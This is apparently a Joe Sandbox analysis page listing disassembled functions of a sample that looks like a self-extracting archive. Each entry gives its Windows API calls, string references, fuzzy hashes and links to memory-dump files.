Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003E2FC2,003E2FC2,?,?,?,003E75FF,00000001,00000001,F5E85006), ref: 003E7408
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003E75FF,00000001,00000001,F5E85006,?,?,?), ref: 003E748E
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003E7588
__freea.LIBCMT ref: 003E7595

Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E

__freea.LIBCMT ref: 003E759E
__freea.LIBCMT ref: 003E75C3

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: c0dee0a7a1137cfcc47a91b3924b37a8b66fafb19d488d2087dcdc1da0d227d2
Instruction ID: e4134a2e6dc1c5dd764909110da2c06e8e0770753e34af95aa1a70974e6e4e58
Opcode Fuzzy Hash: c0dee0a7a1137cfcc47a91b3924b37a8b66fafb19d488d2087dcdc1da0d227d2
Instruction Fuzzy Hash: D351D6726142A6ABEB278F66CC41EBF77A9EB45750F164729FC14DA2C0EB34DC40C650

Function 003D8FC8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 003D8FDF
SHAutoComplete.SHLWAPI(?,00000010), ref: 003D9016

Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 003D9006

Strings

@Ut, xrefs: 003D9016
EDIT, xrefs: 003D8FEA, 003D8FF5, 003D9002

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 8ae426d798dd2bf86f699e88bef3cb8f1716dbeec769810d81add7365fdcee22
Instruction ID: 75a147c59dd9368855ae0bd2da811b33a85964d20dde5ca36fff068c367be46c
Opcode Fuzzy Hash: 8ae426d798dd2bf86f699e88bef3cb8f1716dbeec769810d81add7365fdcee22
Instruction Fuzzy Hash: 6BF0E93360062C67EB325625BC05FAB766C9B49B11F050057BA04F2280D760D915C6E6

Function 003D9036 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003CF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
Part of subcall function 003CF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346

OleInitialize.OLE32(00000000), ref: 003D904F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003D9086
SHGetMalloc.SHELL32(004020E8), ref: 003D9090

Strings

riched20.dll, xrefs: 003D903E
3uo, xrefs: 003D9067

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3uo
API String ID: 3498096277-228713755
Opcode ID: bc291b9dcd2c1debdb83215b9d523e2ab77d135c0d23c894b13281b5dc6aaa81
Instruction ID: be02dcd33d8844100dd9576e89a19930fd0bbf0420dba63b1138832680f69d66
Opcode Fuzzy Hash: bc291b9dcd2c1debdb83215b9d523e2ab77d135c0d23c894b13281b5dc6aaa81
Instruction Fuzzy Hash: 1DF03CB5800209ABCB11AF9AD8499EEFBBCEB84300F00406BE804E2240D7B41605CBA1

Function 003CF9D1 Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003CFDC9: ResetEvent.KERNEL32(?,?,003CF9F3,00D53B38,?,00401E74,00000000,003EF79B,000000FF,000001B8,003CFC8F,?,?,?,?,003CA5A0), ref: 003CFDE9
Part of subcall function 003CFDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,003CA5A0,?,?,?,?,003EF79B,000000FF), ref: 003CFDFD

ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 003CFA05
CloseHandle.KERNEL32(?,?), ref: 003CFA1F
DeleteCriticalSection.KERNEL32(?), ref: 003CFA38
CloseHandle.KERNELBASE(?), ref: 003CFA44
CloseHandle.KERNEL32(?), ref: 003CFA50

Part of subcall function 003CFAC7: WaitForSingleObject.KERNEL32(?,000000FF,003CFD0B,?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFACD
Part of subcall function 003CFAC7: GetLastError.KERNEL32(?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFAD9

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 849abdfc1433f5fa7f7afee6571c4b01b53073781b94b5efc7e8f68003fd4564
Instruction ID: 6117523d6f0b735c67a0f716070ee5c377e51ec9bebc0534cb43032168975202
Opcode Fuzzy Hash: 849abdfc1433f5fa7f7afee6571c4b01b53073781b94b5efc7e8f68003fd4564
Instruction Fuzzy Hash: EB019E32000744EFC7229B28DD88F96BBAAFB45710F00452DF2AE92561CF716800CB21

Function 003DBE0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 003DBE20
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003DBE5C

Strings

sfxpar, xrefs: 003DBE57
sfxcmd, xrefs: 003DBE1B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 454fd669d8f06d6f7dd08ce55e6f054f66acbe2107b1442e79146306a4031ac2
Instruction ID: 75f457a2971073fc54459e2051ff75663cb3ee90f5a6f9d833d3ad4f42cd25d7
Opcode Fuzzy Hash: 454fd669d8f06d6f7dd08ce55e6f054f66acbe2107b1442e79146306a4031ac2
Instruction Fuzzy Hash: 37F0A773811224E6C7232FD5BC09EF67BAC9F14B52F010056FE849A342D7648C40C7A0

Function 003C973D Relevance: 6.1, APIs: 4, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,003C777A,?,00000005,?,00000011), ref: 003C97BD
GetLastError.KERNEL32(?,?,003C777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003C97CA
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,003C777A,?,00000005,?), ref: 003C97FF
GetLastError.KERNEL32(?,?,003C777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003C9807

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 0c673b483bc3f1579396413997144aee61c30c6a8bc0ba8aa884dc34ad8ef7c5
Instruction ID: 751358b7b3a39f32ac23f6a86779a94957ba3061e13780ca34d5cdca6b03e7c2
Opcode Fuzzy Hash: 0c673b483bc3f1579396413997144aee61c30c6a8bc0ba8aa884dc34ad8ef7c5
Instruction Fuzzy Hash: 243134718407556FE7229F249C09FE6BBA8FB45324F12462EF990C72D1D775AC88CB90

Function 003C9613 Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 003C9623
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 003C963B
GetLastError.KERNEL32 ref: 003C966D
GetLastError.KERNEL32 ref: 003C968C

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 9722da8f0dff7a3df02f0d1dc8cbd7022f495945f7ac02e154fcc95f0fc56358
Instruction ID: 6b83bef32f62f83f445c48cbb9660a6cd00002928f79b295f6d659fd891b3430
Opcode Fuzzy Hash: 9722da8f0dff7a3df02f0d1dc8cbd7022f495945f7ac02e154fcc95f0fc56358
Instruction Fuzzy Hash: FF115730600204ABCF26AB658908F7AB7ADEB05335F13852FE96AC56D0CB369D60CF51

Function 003E77D1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003E2213,00000000,00000000,?,003E7778,003E2213,00000000,00000000,00000000,?,003E7975,00000006,FlsSetValue), ref: 003E7803
GetLastError.KERNEL32(?,003E7778,003E2213,00000000,00000000,00000000,?,003E7975,00000006,FlsSetValue,003F3768,003F3770,00000000,00000364,?,003E63F1), ref: 003E780F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003E7778,003E2213,00000000,00000000,00000000,?,003E7975,00000006,FlsSetValue,003F3768,003F3770,00000000), ref: 003E781D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: f64a58f953533ef95358108efbddfbbbebfe514d3c9e517507204753652014c1
Instruction ID: 21069846d8318c351807c8067350973fd67975fb6f2a9eab3f0bdff512a2ae5d
Opcode Fuzzy Hash: f64a58f953533ef95358108efbddfbbbebfe514d3c9e517507204753652014c1
Instruction Fuzzy Hash: D001D436609272ABC7274B6EAC49A6A3B9CAF147A1B110720F90AD7181D720D801C6E0

Function 003D991E Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003D992F
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D9940
TranslateMessage.USER32(?), ref: 003D994A
DispatchMessageW.USER32(?), ref: 003D9954

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 54c1b0ea28cd05c401c20c22f8809050858417146325f314c25600bb70c7729a
Instruction ID: a3a4633345959e21c3157464f1c2e6b9520f6e50791c4fee5ad869bcf1f695fa
Opcode Fuzzy Hash: 54c1b0ea28cd05c401c20c22f8809050858417146325f314c25600bb70c7729a
Instruction Fuzzy Hash: 95E0EDB2C0212EA78F21ABE6AC4CDEB7F6CEE06365B004056B51DD2010D6789505C7F1

Function 003CFBB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 003CFBD5
SetThreadPriority.KERNEL32(?,00000000), ref: 003CFC1C

Part of subcall function 003C6DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C6DF1

Strings

CreateThread failed, xrefs: 003CFBE1

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 5a7df03a8b11cb105003f8c8c97c6d8e46cd288b08b0de926e09a145254e3ef1
Instruction ID: 6aaafd99a53583d4f711ed1f7c1c864906bbbe162be7ec3e171ee8735e4a7fe6
Opcode Fuzzy Hash: 5a7df03a8b11cb105003f8c8c97c6d8e46cd288b08b0de926e09a145254e3ef1
Instruction Fuzzy Hash: EC01D6B534430E6FD32A6F589D86FB6775AEB40711F21443EFA42D6181CEA1AC058720

Function 003C9BC8 Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,003CC853,00000001,?,?,?,00000000,003D420B,?,?,?,?,?,003D3CB0), ref: 003C9BE3
WriteFile.KERNEL32(?,00000000,?,003D3EB8,00000000,?,?,00000000,003D420B,?,?,?,?,?,003D3CB0,?), ref: 003C9C23
WriteFile.KERNELBASE(?,00000000,?,003D3EB8,00000000,?,00000001,?,?,003CC853,00000001,?,?,?,00000000,003D420B), ref: 003C9C50

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: a0a87e733efceda3e038e6697f683dbf0258b9857616a54070e9299fc12375cb
Instruction ID: 4d7873fa261573efc8f709ccae0f518303ea1270ce3bbc00dd2c38fbf226be45
Opcode Fuzzy Hash: a0a87e733efceda3e038e6697f683dbf0258b9857616a54070e9299fc12375cb
Instruction Fuzzy Hash: 0031FF7114860AAFDB269E24D84CFA6BBACEB50700F02811EF595D7690CB75AC48CBA1

Function 003C9E86 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003C9EAD
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003C9EE0
GetLastError.KERNEL32(?,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003C9EFD

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: ab985557138cfae4c99a485f8c08808c863c34d26f717bc41c099178f87b36e3
Instruction ID: cb7a436dbc5dfef2b7857dd1991f6ea16ff70186402544498c02df90313555af
Opcode Fuzzy Hash: ab985557138cfae4c99a485f8c08808c863c34d26f717bc41c099178f87b36e3
Instruction Fuzzy Hash: B101DE3211026966DB23EA788C4EFFA335C9F16782F0A041FF805EA491DB208D80D7E6

Function 003C3AA3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C3AA8

Strings

CMT, xrefs: 003C3AB7

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: b7dd2467b338c5842fe5b689ffadf5aefdda08f64409a88e5ada800a6015c45f
Instruction ID: 340b6cde8ae7975253715e894d84de6bd16779d68faac4e3af3a45c99c077147
Opcode Fuzzy Hash: b7dd2467b338c5842fe5b689ffadf5aefdda08f64409a88e5ada800a6015c45f
Instruction Fuzzy Hash: 66618D71504F44AADB26DB74CC45EEBB7E8AB14301F44896EE19BCB142DA326E48CF11

Function 003E82C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 003E82E8

Strings

, xrefs: 003E832D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 52f52f098c264d823b57032d6e65f6a06910b2b99a150b8173b85620c3bd7b11
Instruction ID: 7b0bac40694b5f1553f1d1c4830b13129bbb8abbd0fa48d0c012bffc45cf74ea
Opcode Fuzzy Hash: 52f52f098c264d823b57032d6e65f6a06910b2b99a150b8173b85620c3bd7b11
Instruction Fuzzy Hash: 77415B789042E89EDB238F168C84BFABBBDDF05704F6405ECE58D961C2D635A945CF20

Function 003C1DA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C1DA6

Part of subcall function 003C3AA3: __EH_prolog.LIBCMT ref: 003C3AA8

Strings

CMT, xrefs: 003C1DDC

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
